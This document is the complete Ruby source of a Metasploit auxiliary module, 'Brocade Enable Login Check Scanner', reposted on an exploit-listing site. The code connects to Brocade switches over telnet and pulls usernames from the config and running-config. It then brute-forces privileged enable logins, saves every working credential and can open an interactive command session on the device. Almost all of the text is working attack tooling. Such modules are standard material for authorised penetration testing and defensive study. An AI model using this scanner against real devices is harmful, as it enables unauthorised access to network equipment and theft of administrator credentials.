Share
## https://sploitus.com/exploit?id=PACKETSTORM:180956
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'metasploit/framework/credential_collection'  
require 'metasploit/framework/login_scanner/telnet'  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::Telnet  
include Msf::Auxiliary::Report  
include Msf::Auxiliary::AuthBrute  
include Msf::Auxiliary::Scanner  
include Msf::Auxiliary::CommandShell  
include Msf::Sessions::CreateSessionOptions  
include Msf::Auxiliary::ReportSummary  
  
def initialize  
super(  
'Name' => 'Brocade Enable Login Check Scanner',  
'Description' => %q{  
This module will test a range of Brocade network devices for a  
privileged logins and report successes. The device authentication mode  
must be set as 'aaa authentication enable default local'.  
Telnet authentication, e.g. 'enable telnet authentication', should not  
be enabled in the device configuration.  
  
This module has been tested against the following devices:  
ICX6450-24 SWver 07.4.00bT311,  
FastIron WS 624 SWver 07.2.02fT7e1  
},  
'Author' => 'h00die <mike[at]shorebreaksecurity.com>',  
'References' =>  
[  
[ 'CVE', '1999-0502'] # Weak password  
],  
'License' => MSF_LICENSE  
)  
register_options(  
[  
OptBool.new('GET_USERNAMES_FROM_CONFIG', [ false, 'Pull usernames from config and running config', true])  
], self.class  
)  
  
@no_pass_prompt = []  
end  
  
def get_username_from_config(un_list,ip)  
["config", "running-config"].each do |command|  
print_status(" Attempting username gathering from #{command} on #{ip}")  
sock.puts("\r\n") # ensure that the buffer is clear  
config = sock.recv(1024)  
sock.puts("show #{command}\r\n")  
  
# pull the entire config  
while true do  
sock.puts(" \r\n") # paging  
config << sock.recv(1024)  
# Read until we are back at a prompt and have received the 'end' of  
# the config.  
break if config.match(/>$/) and config.match(/end/)  
end  
  
config.each_line do |un|  
if un.match(/^username/)  
found_username = un.split(" ")[1].strip  
un_list.push(found_username)  
print_status(" Found: #{found_username}@#{ip}")  
end  
end  
end  
end  
  
attr_accessor :no_pass_prompt  
attr_accessor :password_only  
  
def run_host(ip)  
un_list = []  
if datastore['GET_USERNAMES_FROM_CONFIG']  
connect()  
get_username_from_config(un_list,ip)  
disconnect()  
end  
  
if datastore['USERNAME'] #put the provided username on the array to try  
un_list.push(datastore['USERNAME'])  
end  
  
un_list.delete('logout') #logout, even when used as a un or pass will exit the terminal  
  
un_list.each do |un|  
cred_collection = build_credential_collection(  
username: datastore['USERNAME'],  
password: datastore['PASSWORD']  
)  
  
scanner = Metasploit::Framework::LoginScanner::Telnet.new(  
configure_login_scanner(  
host: ip,  
port: rport,  
proxies: datastore['PROXIES'],  
cred_details: cred_collection,  
stop_on_success: datastore['STOP_ON_SUCCESS'],  
bruteforce_speed: datastore['BRUTEFORCE_SPEED'],  
connection_timeout: datastore['Timeout'],  
max_send_size: datastore['TCP::max_send_size'],  
send_delay: datastore['TCP::send_delay'],  
banner_timeout: datastore['TelnetBannerTimeout'],  
telnet_timeout: datastore['TelnetTimeout'],  
pre_login: lambda { |s| raw_send("enable\r\n", s.sock) },  
framework: framework,  
framework_module: self,  
ssl: datastore['SSL'],  
ssl_version: datastore['SSLVersion'],  
ssl_verify_mode: datastore['SSLVerifyMode'],  
ssl_cipher: datastore['SSLCipher'],  
local_port: datastore['CPORT'],  
local_host: datastore['CHOST']  
)  
)  
  
scanner.scan! do |result|  
credential_data = result.to_h  
credential_data.merge!(  
module_fullname: self.fullname,  
workspace_id: myworkspace_id  
)  
  
if result.success?  
credential_core = create_credential(credential_data)  
credential_data[:core] = credential_core  
create_credential_login(credential_data)  
print_good("#{ip}:#{rport} - Login Successful: #{result.credential}")  
start_telnet_session(ip,rport,result.credential.public,result.credential.private,scanner)  
else  
invalidate_login(credential_data)  
print_error("#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})")  
end  
end  
end  
end  
  
def start_telnet_session(host, port, user, pass, scanner)  
print_status("Attempting to start session #{host}:#{port} with #{user}:#{pass}")  
merge_me = {  
'USERPASS_FILE' => nil,  
'USER_FILE' => nil,  
'PASS_FILE' => nil,  
'USERNAME' => user,  
'PASSWORD' => pass  
}  
  
start_session(self, "TELNET #{user}:#{pass} (#{host}:#{port})", merge_me, true, scanner.sock) if datastore['CreateSession']  
end  
end